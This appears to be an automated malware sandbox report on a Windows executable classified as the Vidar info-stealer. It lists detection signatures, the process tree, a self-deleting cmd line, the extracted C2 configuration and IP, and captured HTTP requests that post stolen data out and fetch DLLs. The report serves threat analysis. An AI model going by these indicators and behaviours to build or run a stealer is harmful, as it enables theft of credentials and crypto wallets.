Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1442218
MD5: b580ff2d001291bf58bdd23a058ef21b
SHA1: 5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
SHA256: 80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B580FF2D001291BF58BDD23A058EF21B)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 2860 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.70aac0.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.70aac0.1.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x201f0:$s1: JohnDoe
  • 0x201e8:$s2: HAL9TH
3.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
0.2.file.exe.70aac0.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
                  No Sigma rule has matched
                  No Snort rule has matched

                  AV Detection

                  Source: file.exeAvira: detected
                  Source: https://steamcommunity.coSophos S4: Label: illegal phishing domain
                  Source: https://95.217.240.101/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dll2Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllUAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllsAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.coAvira URL Cloud: Label: phishing
                  Source: https://t.me/k0monoAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badgesAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllKAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vAvira URL Cloud: Label: malware
                  Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E22BA FreeConsole,GetCurrentThreadId,PostQuitMessage,GetClipBox,CryptDecrypt,std::_Throw_Cpp_error,0_2_006E22BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,3_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,3_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C6D6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C82A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8244C0 PK11_PubEncrypt,3_2_6C8244C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C7F4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C824440 PK11_PrivDecrypt,3_2_6C824440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C8725B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C82A650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C808670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C808670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C84A730
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006F81B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.194.234.100 23.194.234.100
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 7081Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 116501Connection: Keep-AliveCache-Control: no-cache
